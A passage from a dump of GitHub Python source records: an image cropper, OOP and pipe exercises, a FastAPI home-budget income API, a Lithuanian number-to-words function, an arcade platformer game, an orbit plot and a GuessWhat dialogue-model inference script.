image_extensions)]\n\nwith tqdm(total=len(image_files), desc=\"Processing images\") as pbar:\n for filename in image_files:\n filepath = os.path.join(input_directory, filename)\n image = Image.open(filepath)\n cropped_image = crop_image(image)\n \n output_filepath = os.path.join(output_directory, filename)\n 
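# the original filename is reused, so existing files in processed/ are overwritten\n        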
cropped_image.save(output_filepath)\n        pbar.update(1)","repo_name":"ComicDansMS/crop-images","sub_path":"crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7234290225","text":"class Ventilador:\n    def __init__(self, cor, potencia, tensao, preco):\n        self.preco = preco\n        self.__cor = cor\n        self.__potencia = potencia\n        self.__tensao = tensao\n        self.__ligado = False\n\n    def cor(self):\n        return self.__cor\n\n\nclass Batedeira:\n    def __init__(self, cor, potencia, tensao, preco):\n        self.preco = preco\n        self.__cor = cor\n        self.__potencia = potencia\n        self.__tensao = tensao\n        self.__ligado = False\n\n    def cor(self):\n        return self.__cor\n\n\nclass Pessoa:\n    def __init__(self, nome, saldo_na_conta):\n        self.nome = nome\n        self.saldo_na_conta = saldo_na_conta\n        self.ventilador = None\n        self.batedeira = None\n\n    def comprar_ventilador(self, ventilador):\n        if ventilador.preco <= self.saldo_na_conta:\n            self.saldo_na_conta -= ventilador.preco\n            self.ventilador = ventilador\n\n    def comprar_batedeira(self, batedeira):\n        if batedeira.preco <= self.saldo_na_conta:\n            self.saldo_na_conta -= batedeira.preco\n            self.batedeira = batedeira\n\n    def __str__(self):\n        if (self.ventilador or self.batedeira):\n            return f\"{self.nome} - owns a new product.\"\n        return f\"{self.nome} - does not own a new product.\"\n\n\nventilador_branco = Ventilador(\"branco\", potencia=250, tensao=220, preco=100)\npessoa = Pessoa(\"Maria\", saldo_na_conta=2000)\npessoa.comprar_ventilador(ventilador_branco)\n\n\nbatedeira_pink = Batedeira(\"pink\", potencia=240, tensao=110, preco=2250)\npessoa = Pessoa(\"Pedro\", saldo_na_conta=5000)\npessoa.comprar_batedeira(batedeira_pink)\n\nbatedeira_preta = Batedeira(\"preta\", potencia=1100, tensao=110, preco=6250)\npessoa = Pessoa(\"Betinho\", saldo_na_conta=10000)\npessoa.comprar_batedeira(batedeira_preta)\n\nprint(pessoa)\n","repo_name":"BenHurAlbertassi12/CienciaDaInformacao","sub_path":"padroesDeProjeto/Dia1/exercicio_composicao.py","file_name":"exercicio_composicao.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14253710904","text":"from fastapi import APIRouter, HTTPException, Depends\nfrom dbmanagement.manage_db import *\nfrom utils import signJWT, decodeJWT, checkChild\nfrom bearer import JWTBearer\n\n\nrouter = APIRouter()\ne404 = HTTPException(status_code=404, detail=\"Data not found\")\n\n\ndb = Db(\"home_budget\", True)\nconn = sqlite3.connect(\"home_budget.db\")\nc = conn.cursor()\n\n\n@router.post(\"/Incomes\", tags=[\"Income\"], dependencies=[Depends(JWTBearer())])\nasync def post_income(\n    walletId: int,\n    userId: int,\n    amount: float,\n    date: str,\n    category: str,\n    name: str | None = None,\n    token: dict = Depends(JWTBearer()),\n):\n    checkChild(userId, decodeJWT(token)[\"user_id\"])\n    wallets_ownerships = db.get(\"WalletOwnership\")\n\n    if (walletId, userId) not in wallets_ownerships:\n        raise HTTPException(\n            status_code=217,\n            detail=\"Cannot add income. 
User/wallet does not exist or user is not the owner of the wallet.\",\n        )\n\n    db.insert(\"Income\", [walletId, userId, amount, date, category, name])\n\n    conn.commit()\n\n    return {\n        \"walletId\": walletId,\n        \"userId\": userId,\n        \"amount\": amount,\n        \"date\": date,\n        \"category\": category,\n        \"name\": name,\n    }\n\n\n@router.get(\"/Incomes\", tags=[\"Income\"], dependencies=[Depends(JWTBearer())])\nasync def get_income(\n    userId: int,\n    id: int,\n    token: dict = Depends(JWTBearer()),\n):\n    checkChild(userId, decodeJWT(token)[\"user_id\"])\n    ids = c.execute(f\"SELECT id FROM Income\").fetchall()\n    ids = [x for tpl in ids for x in tpl]\n\n    if id not in ids:\n        raise HTTPException(\n            status_code=217,\n            detail=\"No such income in incomes (wrong id).\",\n        )\n\n    income = c.execute(f\"SELECT * FROM Income WHERE id = {id}\").fetchall()\n\n    data = {}\n    data[\"walletId\"] = income[0][1]\n    data[\"userId\"] = income[0][2]\n    data[\"amount\"] = income[0][3]\n    data[\"date\"] = income[0][4]\n    data[\"category\"] = income[0][5]\n    data[\"name\"] = income[0][6]\n\n    return data\n\n\n@router.put(\"/Incomes\", tags=[\"Income\"], dependencies=[Depends(JWTBearer())])\nasync def put_income(\n    userId: int,\n    id: int,\n    amount: float,\n    date: str,\n    name: str | None = None,\n    token: dict = Depends(JWTBearer()),\n):\n    checkChild(userId, decodeJWT(token)[\"user_id\"])\n    ids = c.execute(f\"SELECT id FROM Income\").fetchall()\n    ids = [x for tpl in ids for x in tpl]\n\n    if id not in ids:\n        raise HTTPException(\n            status_code=217,\n            detail=\"No such income in incomes (wrong id).\",\n        )\n\n    # update all three columns in one parameterised statement\n    c.execute(\n        \"UPDATE Income SET amount = ?, date = ?, name = ? WHERE id = ?\",\n        (amount, date, name, id),\n    )\n    conn.commit()\n\n    return {\"amount\": amount, \"date\": date, \"name\": name}\n\n\n@router.delete(\"/Incomes\", tags=[\"Income\"], dependencies=[Depends(JWTBearer())])\nasync def delete_income(\n    userId: int,\n    id: int,\n    token: dict = Depends(JWTBearer()),\n):\n    checkChild(userId, decodeJWT(token)[\"user_id\"])\n    ids = c.execute(f\"SELECT id FROM Income\").fetchall()\n    ids = [x for tpl in ids for x in tpl]\n\n    if id not in ids:\n        raise HTTPException(\n            status_code=217,\n            detail=\"No such income in incomes (wrong id).\",\n        )\n\n    c.execute(f\"DELETE FROM Income WHERE id = {id}\")\n    conn.commit()\n\n    return \"Deleted successfully\"\n","repo_name":"akopij70/HomeBudgetApp","sub_path":"routers/income.py","file_name":"income.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38334824849","text":"\r\n\r\ndef numertoworld(numerinput):\r\n    units = [\"\", \"Vienas\", \"Du\", \"Trys\", \"Keturi\", \"Penki\", \"Šeši\", \"Septyni\", \"Aštuoni\", \"Devyni\"]\r\n    tens = [\"\", \"Dešimt\", \"Dvidešimt\", \"Trisdešimt\", \"Keturiasdešimt\", \"Penkiasdešimt\", \"Šešiasdešimt\", \"Septyniasdešimt\", \"Aštuoniasdešimt\", \"Devyniasdešimt\"]\r\n    hundreds = [\"\", \"Šimtas\", \"Dviejų šimtų\", \"Trejų šimtų\", \"Keturių šimtų\", \"Penkių šimtų\", \"Šešių šimtų\", \"Septynių šimtų\", \"Aštuonių šimtų\", \"Devynių šimtų\"]\r\n\r\n    # Remove the Euro symbol\r\n    number = str(numerinput).replace('€', '')\r\n\r\n    # Separate the integer and decimal parts\r\n    parts = number.split('.')\r\n    \r\n    if len(parts) == 1: \r\n        integer_part = int(parts[0])\r\n        decimal_part = 0\r\n    elif len(parts) == 2: \r\n        integer_part = int(parts[0])\r\n        decimal_part = int(parts[1])\r\n    else:\r\n        raise ValueError(\"Invalid number format\")\r\n\r\n    # Lithuanian plural: 1 -> euras, 2-9 -> eurai, 0 and 11-19 -> eurų\r\n    euras = \"euras\" if integer_part % 10 == 1 and integer_part % 100 != 11 else \"eurų\" if integer_part % 10 == 0 or 11 <= integer_part % 100 <= 19 else \"eurai\"\r\n\r\n    integer_text = \"\"\r\n    decimal_text = \"\"\r\n    if integer_part == 0:\r\n        decimal_text = numertoworld(decimal_part) + \" centų\"\r\n    elif integer_part < 10:\r\n        integer_text = units[integer_part] + \" \" + euras\r\n    elif integer_part < 100:\r\n        integer_text = tens[integer_part // 10] + \" \" + units[integer_part % 10] + \" \" + euras\r\n    else:\r\n        integer_text = (\r\n            hundreds[integer_part // 100]\r\n            + \" \"\r\n            + numertoworld(integer_part % 100)\r\n            + \" \"\r\n            + euras\r\n        )\r\n    \r\n    if decimal_part > 0:\r\n        decimal_text = numertoworld(decimal_part) + \" centų\"\r\n\r\n    return f\"{integer_text} ir {decimal_text}\" if decimal_part > 0 else integer_text","repo_name":"NeLagina/Projektas-Latvis","sub_path":"modules/numertoworld.py","file_name":"numertoworld.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"lt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30761232071","text":"import os\n\nr, w = os.pipe()\nreader = open(r)\nwriter = open(w, 'w')\n\nif os.fork() == 0:\n    print(\"Child has read: \", reader.read(5))\nelse:\n    writer.write(\"Hello!\")\n    writer.flush()  # push the buffered bytes through the pipe so the child's read() can return\n# both the parent and the child fall through to this loop\nfor x, xname in [(reader, \"reader\"), (writer, \"writer\")]:\n    print(xname + \" is readable? \", x.readable())\n    print(xname + \" is writable?\", x.writable())\n    print(xname + \" is seekable?\", x.seekable())\n","repo_name":"kakkoyun/cmpe322","sub_path":"Exercises/Exercise.py","file_name":"Exercise.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9943765920","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'countingValleys' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following parameters:\n#  1. INTEGER steps\n#  2. STRING path\n#\n\ndef countingValleys(steps, path):\n    # Write your code here\n    d = {}\n    l = [path[0]]\n    countvalley = 0\n\n    for i in range(1, steps):\n        c=0\n        if len(l)==1 and l[0]==\"D\":\n            c=1\n        if len(l)==0 or path[i] == l[-1]:\n            l.append(path[i])\n        else:\n            l.pop()\n            if c==1 and len(l)==0:\n                countvalley+=1\n    return countvalley\n\n\nif __name__ == '__main__':\n    fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n    steps = int(input().strip())\n\n    path = input()\n\n    result = countingValleys(steps, path)\n\n    fptr.write(str(result) + '\\n')\n\n    fptr.close()\n","repo_name":"GizawAAiT/Competitive_programming","sub_path":"Community/week 1/numbers of valley.py","file_name":"numbers of valley.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"41960304719","text":"'''\nSPRITE GAME\n-----------\nHere you will start the beginning of a game that you will be able to update as we\nlearn more in upcoming chapters. Below are some ideas that you could include:\n\n1.) Find some new sprite images.\n2.) Move the player sprite with arrow keys rather than the mouse. Don't let it move off the screen.\n3.) Move the other sprites in some way like moving down the screen and then re-spawning above the window.\n4.) Use sounds when a sprite is killed or the player hits the sidewall.\n5.) See if you can reset the game after 30 seconds. Remember the on_update() method runs every 1/60th of a second.\n6.) Try some other creative ideas to make your game awesome. 
Perhaps collecting good sprites while avoiding bad sprites.\n7.) Keep score and use multiple levels. How do you keep track of an all time high score?\n8.) Make a two player game.\n\n'''\n\nimport random\nimport arcade\n\n# --- Constants ---\nBB8_scale = 0.6\ntrooper_scale = 0.1\ntrooper_count = 15\nSW = 800\nSH = 600\nSP = 4\nLevelTime = 30\n\n\nclass Player(arcade.Sprite):\n def __init__(self):\n super().__init__(\"Images/bb8.png\", BB8_scale)\n self.laser = arcade.load_sound(\"game_assets/Sounds/coin.wav\")\n self.grounded = False\n self.slowing = False\n\n def slowdown(self):\n if self.change_x > 0: #or self.change_x < 0:\n self.change_x = self.change_x * 0.9\n if self.change_x < 0.5:\n self.change_x = 0\n self.slowing = False\n if self.change_x < 0: #or self.change_x < 0:\n self.change_x = self.change_x * 0.9\n if self.change_x > -0.5:\n self.change_x = 0\n self.slowing = False\n\n def update(self):\n global LevelTime\n if self.grounded!=True:\n self.change_y -= (8/60)\n else:\n self.change_y = 0\n\n self.center_x += self.change_x\n self.center_y += self.change_y\n\n if self.change_y > 6:\n self.change_y = 6\n\n if self.left < 0:\n self.left = 0\n #arcade.play_sound(self.laser)\n elif self.right > SW:\n self.right = SW\n #arcade.play_sound(self.laser)\n if self.top < 0:\n LevelTime = -1\n #arcade.play_sound(self.laser)\n elif self.top > SH:\n self.top = SH\n #arcade.play_sound(self.laser)\n\n if self.slowing == True:\n if self.grounded == True:\n self.slowdown()\n\n\n\n\nclass Trooper(arcade.Sprite):\n def __init__(self):\n self.textureframe = 0\n super().__init__()\n self.w = int(self.width)\n self.h = int(self.height)\n self.angle = 0\n self.scale = 0.2\n\n #self.draw_hit_box()\n\n #self.textureframe = 0\n self.texture_list = []\n texture = arcade.load_texture(\"game_assets/Coins/frame_0.gif\")\n self.texture_list.append(texture)\n texture = arcade.load_texture(\"game_assets/Coins/frame_1.gif\")\n self.texture_list.append(texture)\n texture = arcade.load_texture(\"game_assets/Coins/frame_2.gif\")\n self.texture_list.append(texture)\n texture = arcade.load_texture(\"game_assets/Coins/frame_3.gif\")\n self.texture_list.append(texture)\n texture = arcade.load_texture(\"game_assets/Coins/frame_4.gif\")\n self.texture_list.append(texture)\n texture = arcade.load_texture(\"game_assets/Coins/frame_5.gif\")\n self.texture_list.append(texture)\n self.texture = texture\n\n\n def update(self):\n self.center_y += -1\n\n def update_animation(self, delta_time: float = 1/12):\n #print(\"test\")\n self.textureframe += 1\n if self.textureframe > 5:\n self.textureframe = 0\n self.texture = self.texture_list[self.textureframe]\n\nclass Backround():\n def __init__(self, speed,x,y,h):\n self.speed = speed\n self.x = x\n self.y = y\n self.inx = x\n self.h = h\n\n def drawmount(self):\n if self.x > -200 and self.x < 1000:\n arcade.draw_rectangle_filled(self.x,self.y,self.h,self.h,arcade.color.GREEN,45)\n arcade.draw_rectangle_outline(self.x, self.y, self.h, self.h, arcade.color.GRAY,1,45)\n\n def updatemont(self):\n #self.x += self.speed\n if self.x < -200:\n self.x = random.randint(1000,1200)\n\nclass World(arcade.Sprite):\n def __init__(self,texpath):\n self.texturepath = texpath\n super().__init__(self.texturepath, 1)\n self.laser = arcade.load_sound(\"game_assets/Sounds/coin.wav\")\n\n def update(self):\n pass\n\n\n\n#------MyGame Class--------------\nclass MyGame(arcade.Window):\n\n def __init__(self,SW,SH,title):\n self.time = 0\n self.cooldown = 0\n self.ct = 0\n super().__init__(SW, SH, title)\n 
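# hide the OS cursor and sync drawing to the display's refresh rate\n        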
self.set_mouse_visible(False)\n self.set_vsync(True)\n arcade.set_background_color(arcade.color.SKY_BLUE)\n\n def reset(self):\n global LevelTime\n LevelTime = 30\n\n\n #this is the list of the grass blocks\n self.worldlist = arcade.SpriteList() #floor\n for i in range(int(SW / 32)):\n self.floor = World(\"game_assets/worldtiles/grass.png\")\n self.floor.center_x = (32 / 2) + (32 * i)\n self.floor.center_y = 80 -16\n self.worldlist.append(self.floor)\n\n for i in range(int(SW / 32)):\n self.floor = World(\"game_assets/worldtiles/grass.png\")\n self.floor.center_x = (32 / 2) + (32 * i)\n self.floor.center_y = 420\n self.worldlist.append(self.floor)\n\n for i in range(int(SW / 32)):\n self.floor = World(\"game_assets/worldtiles/grass.png\")\n self.floor.center_x = (32 / 2) + (32 * i)\n self.floor.center_y = 600\n self.worldlist.append(self.floor)\n\n for i in range(int(300 / 32)): #lower Platform\n self.floor = World(\"game_assets/worldtiles/grass.png\")\n self.floor.center_x = (32 / 2) + (32 * i)\n self.floor.center_y = 200\n self.worldlist.append(self.floor)\n\n for i in range(int(300 / 32)): #Upper Platform\n self.floor = World(\"game_assets/worldtiles/grass.png\")\n self.floor.center_x = (32 / 2) + (32 * i) + 400\n self.floor.center_y = 320\n self.worldlist.append(self.floor)\n\n for i in range(int(SW / 32)):\n self.floor = World(\"game_assets/worldtiles/Dirt1.png\")\n self.floor.center_x = (32 / 2) + (32 * i)\n self.floor.center_y = 80 -16 -32\n self.worldlist.append(self.floor)\n\n self.player_list = arcade.SpriteList()\n self.trooper_list = arcade.SpriteList()\n\n self.backlist = []\n for i in range(25):\n background = Backround(-0.5, random.randint(-200, 1000), 0, random.randint(50, 200))\n self.backlist.append(background)\n\n self.score = 0\n\n self.BB8 = Player()\n self.BB8.center_x = SW / 2\n self.BB8.center_y = 400\n self.player_list.append(self.BB8)\n\n for i in range(trooper_count):\n trooper = Trooper()\n trooper.center_x = random.randrange(trooper.w,SW-trooper.w)\n trooper.center_y = random.randrange(trooper.h+90,SH)\n self.trooper_list.append(trooper)\n\n def newplat(self):\n print(\"new plat\")\n offset = random.randrange(0,SW-300)\n for i in range(int(300 / 32)): #Upper Platform\n self.floor = World(\"game_assets/worldtiles/grass.png\")\n self.floor.center_x = (32 / 2) + (32 * i) + offset\n self.floor.center_y = SH + 20\n self.worldlist.append(self.floor)\n\n def newcoin(self):\n print(\"new coin\")\n coin = Trooper()\n coin.center_y = SH + 20\n coin.center_x = random.randrange(10,SW-10)\n self.trooper_list.append(coin)\n\n\n\n def on_draw(self):\n arcade.start_render()\n\n for obj in self.backlist:\n obj.drawmount()\n\n self.worldlist.draw()\n\n self.trooper_list.draw()\n self.player_list.draw()\n\n arcade.draw_rectangle_filled(SW/2,5,SW,30,arcade.color.BLACK)\n output = f\"Score: {self.score}\"\n timeremaining = f\"Time Left: {LevelTime:.2f}\"\n arcade.draw_text(output,10,1, arcade.color.WHITE, 14)\n arcade.draw_text(timeremaining, 100, 1, arcade.color.WHITE, 14)\n\n if LevelTime <= 0:\n arcade.draw_rectangle_filled(SW/2,SH/2,SW,SH,arcade.color.BLACK)\n arcade.draw_text(\"Game Over! 
\\n Press R to restart\",SW/2,SH/2,arcade.color.WHITE,30,align= \"center\",anchor_x=\"center\",anchor_y= \"center\")\n\n def on_update(self, dt):\n global LevelTime\n\n\n\n self.time +=1\n if self.time == 4:\n self.time = 0\n self.trooper_list.update_animation()\n LevelTime -= (4 / 60)\n\n self.cooldown -= 1\n if self.cooldown < 0:\n self.cooldown = 0\n\n #self.BB8.angle = - 0.5 * (angle(self.BB8.change_x,self.BB8.change_y+8) + 90)\n\n\n\n self.player_list.update()\n self.trooper_list.update()\n\n for obj in self.backlist:\n obj.updatemont()\n obj.x = obj.inx - ( 0.1 * self.BB8.center_x)\n\n trooper_hit_list = arcade.check_for_collision_with_list(self.BB8,self.trooper_list)\n for troop in trooper_hit_list:\n troop.kill()\n self.score +=1\n arcade.play_sound(self.BB8.laser)\n self.newcoin()\n LevelTime += 0.5\n\n for plat in self.worldlist:\n plat.center_y += -1\n if plat.center_y < -20:\n plat.kill()\n if self.cooldown < 1:\n self.newplat()\n self.cooldown += 60\n\n for coin in self.trooper_list:\n if coin.center_y < -20:\n coin.kill()\n self.newcoin()\n\n\n\n #logic for detecting if player is on the ground\n groundcheck = arcade.check_for_collision_with_list(self.BB8,self.worldlist)\n if self.BB8.change_y < 0.1:\n if groundcheck:\n for obj in groundcheck:\n if abs(obj.top - self.BB8.bottom) < 7:\n self.BB8.bottom = obj.top -2\n\n self.BB8.grounded = True\n if not groundcheck:\n self.BB8.grounded = False\n\n\n\n\n def on_key_press(self, symbol, modifiers: int):\n print(symbol)\n # if symbol ==119:\n # self.BB8.change_y = SP\n #\n # if symbol ==115:\n # self.BB8.change_y = -SP\n\n if symbol ==97:\n self.BB8.slowing = False\n self.BB8.change_x = -SP\n\n if symbol ==100:\n self.BB8.slowing = False\n self.BB8.change_x = SP\n\n if symbol == 32:\n if self.BB8.grounded == True:\n self.BB8.center_x += 1\n self.BB8.change_y = 6\n self.BB8.grounded = False\n if symbol == 114:\n if LevelTime <= 0:\n self.reset()\n\n def on_key_release(self, symbol: int, modifiers: int):\n #print(symbol)\n # if symbol ==119:\n # self.BB8.change_y = 0\n #\n # if symbol ==115:\n # self.BB8.change_y = 0\n\n if symbol ==97:\n if self.BB8.change_x < 0:\n self.BB8.slowing = True\n\n if symbol ==100:\n if self.BB8.change_x > 0:\n self.BB8.slowing = True\n\n\n\n\n\n\n#-----Main Function--------\ndef main():\n window = MyGame(SW,SH,\"Endless Platforms\")\n window.reset()\n arcade.run()\n\n#------Run Main Function-----\nif __name__ == \"__main__\":\n main()","repo_name":"MitchellDan/Chs.15-21_Game-Design","sub_path":"15.1_Game.py","file_name":"15.1_Game.py","file_ext":"py","file_size_in_byte":11709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"8135612485","text":"import planet as p\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nsunce_zemlja = p.Planet(np.array([1.496*10**(11), 0]), np.array([0.1, 0.1]), np.array([0, 29783]), np.array([0, 0]), np.array([0, 0]), np.array([0, 0]), 5.9742*10**(24), 1.989*10**(30))\n # r1, r2, v1, v2, a1, a2, m1, m2\nx1, y1, x2, y2 = sunce_zemlja.range(100)\n\nplt.figure(figsize=(5.5, 5.5))\nplt.plot(x1, y1)\nplt.plot(x2, y2)\nplt.legend([\"Zemlja\", \"Sunce\"])\nplt.title(\"x-y graf\")\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.show()","repo_name":"dkusanovi/PAF","sub_path":"Vjezbe/Vjezbe_11/zadatak_1.py","file_name":"zadatak_1.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16779954379","text":"import argparse\nimport 
torch\nimport logging\nfrom torchvision.models import vgg16\nfrom multiprocessing import cpu_count\nfrom torch.utils.data import DataLoader\nfrom collections import OrderedDict, defaultdict\n\nimport utils\nfrom dataset import GuessWhatDataset\nfrom models import QGen, Guesser, Oracle, DM1, DM2\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ntorch.set_printoptions(profile='full')\n\ndef main(args):\n\n    print(args)\n\n    logging.basicConfig(filename='inference_%s_%i.log'%(args.mode, args.max_num_questions),level=logging.INFO)\n\n    splits = (['train'] if args.train_set else list()) + ['valid'] + (['test'] if args.test_set else list())\n\n    datasets = OrderedDict()\n    for split in splits:\n        datasets[split] = GuessWhatDataset(\n            split=split,\n            data_dir=args.data_dir,\n            model='inference',\n            coco_dir=args.coco_dir,\n            successful_only=False,\n            min_occ=args.min_occ,\n            max_sequence_length=args.max_sequence_length,\n            h5File='vgg_fc8.hdf5',\n            mapping_file='imagefile2id.json')\n\n\n    qgen = QGen(\n        num_embeddings=datasets['valid'].vocab_size,\n        embedding_dim=args.qgen_embedding_dim,\n        hidden_size=args.qgen_hidden_size,\n        visual_embedding_dim=args.qgen_visual_embedding_dim,\n        padding_idx=datasets['valid'].pad\n    )\n    qgen.to(device)\n    qgen.load_state_dict(torch.load('bin/qgenX.pt', map_location=lambda storage, loc: storage))\n\n    # vgg = vgg16(pretrained=True)\n    # vgg.eval()\n    # vgg.to(device)\n\n    guesser = Guesser(\n        num_word_embeddings=datasets['valid'].vocab_size,\n        word_embedding_dim=args.guesser_word_embedding_dim,\n        hidden_size=args.guesser_hidden_size,\n        num_cat_embeddings=datasets['valid'].num_categories,\n        cat_embedding_dim=args.guesser_cat_embedding_dim,\n        mlp_hidden=args.guesser_mlp_hidden\n    )\n    guesser.to(device)\n    guesser.load_state_dict(torch.load('bin/guesser.pt', map_location=lambda storage, loc: storage))\n\n\n    oracle = Oracle(\n        num_word_embeddings=datasets['valid'].vocab_size,\n        word_embedding_dim=args.oracle_word_embedding_dim,\n        hidden_size=args.oracle_hidden_size,\n        num_cat_embeddings=datasets['valid'].num_categories,\n        cat_embedding_dim=args.oracle_cat_embedding_dim,\n        mlp_hidden=args.oracle_mlp_hidden\n    )\n    oracle.to(device)\n    oracle.load_state_dict(torch.load('bin/oracle.pt', map_location=lambda storage, loc: storage))\n\n\n    if args.mode == 'dm1':\n        dm = DM1(\n            rnn_hidden_size=args.qgen_hidden_size,\n            attention_hidden=512\n        )\n        dm.load_state_dict(torch.load('bin/dm1_nomask128.pt', map_location=lambda storage, loc: storage))\n\n    elif args.mode == 'dm2':\n        dm = DM2()\n        dm.load_state_dict(torch.load('bin/dm2.pt', map_location=lambda storage, loc: storage))\n\n    if args.mode != 'baseline':\n        dm.to(device)\n        dm.eval()\n\n\n    # disable gradient tracking for the whole inference run\n    torch.set_grad_enabled(False)\n\n    logs = defaultdict(lambda: defaultdict(float))\n\n    for split in splits:\n\n        data_loader = DataLoader(\n            dataset=datasets[split],\n            batch_size=args.batch_size,\n            num_workers=args.num_workers\n        )\n\n        for iteration, sample in enumerate(data_loader):\n\n            for k, v in sample.items():\n                if torch.is_tensor(v):\n                    sample[k] = v.to(device)\n\n            dialogue = sample['input'].clone()\n            dialogue_lengths = sample['input'].new_zeros(sample['input'].size(0))\n\n            fc8 = sample['image']\n\n            # get first question\n            questions, questions_lengths, h, c, hidden_states = qgen.inference(\n                sample['input'],\n                fc8=fc8,\n                end_of_question_token=datasets['valid'].w2i[''],\n                hidden=None,\n                strategy=args.strategy\n            )\n\n            B = sample['input'].size(0)\n            idx = sample['input'].new_tensor(list(range(B))).long()\n            running_idx = 
sample['input'].new_tensor(list(range(B))).long()\n mask_current = sample['input'].new_ones((B)).byte()\n\n target_category = sample['target_category']\n target_spatial = sample['target_spatial']\n categories = sample['categories']\n bboxes = sample['bboxes']\n\n answer_logits = sample['input'].new_empty((B, 3)).float()\n\n if args.mode != 'baseline':\n num_questions_asked = sample['input'].new_ones(B)\n\n for qi in range(1, args.max_num_questions+1):\n\n # add question to dialogue\n dialogue = append_to_padded_sequence(\n padded_sequence=dialogue,\n sequence_lengths=dialogue_lengths,\n appendix=questions,\n appendix_lengths=questions_lengths,\n mask_current=mask_current\n )\n\n dialogue_lengths[running_idx] += questions_lengths\n\n # get answers\n answer_logits = oracle.forward(\n question=questions,\n length=questions_lengths,\n target_category=target_category[running_idx],\n target_spatial=target_spatial[running_idx]\n )\n answers = answer_logits.topk(1)[1].long()\n answers = answer_class_to_token(answers, datasets['valid'].w2i)\n\n # add answers to dialogue\n dialogue = append_to_padded_sequence(\n padded_sequence=dialogue,\n sequence_lengths=dialogue_lengths,\n appendix=answers,\n appendix_lengths=answers.new_ones(answers.size(0)),\n mask_current=mask_current\n )\n dialogue_lengths[running_idx] += 1\n\n\n # ask next question\n questions, questions_lengths, h[:, running_idx], c[:, running_idx], next_hidden_states = qgen.inference(\n input=answers,\n fc8=fc8[running_idx],\n end_of_question_token=datasets['valid'].w2i[''],\n hidden=(h[:, running_idx], c[:, running_idx]),\n strategy=args.strategy\n )\n\n\n if args.mode == 'dm1':\n\n # add hidden state from answer\n hidden_states_incl_answer = append_to_padded_sequence(\n padded_sequence=hidden_states,\n sequence_lengths=dialogue_lengths,\n appendix=next_hidden_states,\n appendix_lengths=dialogue_lengths.new_ones((B)),\n mask_current=mask_current\n )\n\n # update hidden states to include all hidden states of next question\n hidden_states = append_to_padded_sequence(\n padded_sequence=hidden_states,\n sequence_lengths=dialogue_lengths,\n appendix=next_hidden_states,\n appendix_lengths=questions_lengths,\n mask_current=mask_current\n )\n\n dm_logits = dm(\n hidden_states=hidden_states_incl_answer[running_idx],\n lengths=dialogue_lengths[running_idx]+1,\n fc8=fc8[running_idx],\n masking=False\n )\n\n\n elif args.mode == 'dm2':\n object_logits, guesser_hidden_states = guesser(\n sequence=dialogue[running_idx],\n sequence_length=dialogue_lengths[running_idx],\n objects=categories[running_idx],\n spatial=bboxes[running_idx],\n return_hidden=True\n )\n\n dm_logits = dm(\n hidden_states=guesser_hidden_states,\n fc8=fc8[running_idx],\n )\n\n if args.mode != 'baseline':\n decision_logits, decisions = torch.max(dm_logits, 1)\n\n # update running idx\n mask_previous = mask_current.clone()\n mask_current[running_idx] = (decisions != 1)\n if mask_current.sum() > 0 and qi < args.max_num_questions:\n running_idx = idx.masked_select(mask_current)\n num_questions_asked[running_idx] += 1\n\n # remove stopped questions\n _, qS = questions.size()\n running_questions = questions.new_zeros(B, qS)\n running_questions.masked_scatter_(mask_previous.unsqueeze(1).repeat(1, qS), questions)\n running_questions = running_questions[mask_current]\n questions = running_questions\n\n running_questions_lengths = questions_lengths.new_zeros(B)\n running_questions_lengths.masked_scatter_(mask_previous, questions_lengths)\n running_questions_lengths = 
running_questions_lengths[mask_current]\n questions_lengths = running_questions_lengths\n\n else:\n break\n\n object_logits = guesser(\n sequence=dialogue,\n sequence_length=dialogue_lengths,\n objects=sample['categories'],\n spatial=sample['bboxes']\n )\n\n acc = utils.accuracy(predictions=object_logits, targets=sample['target'])\n logs[split]['running_acc'] += 1/(iteration+1) * (acc - logs[split]['running_acc'])\n\n if args.mode != 'baseline':\n logs[split]['avg_num_questions'] += 1/(iteration+1) * (torch.mean(num_questions_asked.float()).item() - logs[split]['avg_num_questions'])\n\n # bookkeeping\n if iteration % args.print_every == 0 or iteration+1 == len(data_loader):\n if args.mode != 'baseline':\n s = \"Running-Mean-No-Questions %.3f\"%(logs[split]['avg_num_questions'])\n else:\n s = \"\"\n print(\"%s Batch %04d/%04d Batch-Acc %.3f Running-Mean-Acc %.3f %s\"\n %(split.upper(), iteration, len(data_loader)-1, acc, logs[split]['running_acc'], s))\n\n\n\n logging.info(\"++++++++++%s++++++++++\"%split.upper())\n logging.info(\"Set Accuracy %.5f (MQ=%i)\"%(logs[split]['running_acc'] * 100, args.max_num_questions))\n if args.mode != 'baseline':\n logging.info(\"Avg. Number of Questions %.3f\"%(logs[split]['avg_num_questions']))\n logging.info(\"++++++++++%s++++++++++\"%('+'*len(split)))\n\ndef append_to_padded_sequence(padded_sequence, sequence_lengths, appendix, appendix_lengths, mask_current):\n\n assert mask_current.sum().item() == appendix.size(0)\n\n sequence = list()\n lengths = list()\n\n # get the max length of the new sequences\n appendix_lengths_padded = appendix_lengths.new_zeros(padded_sequence.size(0))\n appendix_lengths_padded.masked_scatter_(mask_current, appendix_lengths)\n appended_sequences_lengths = 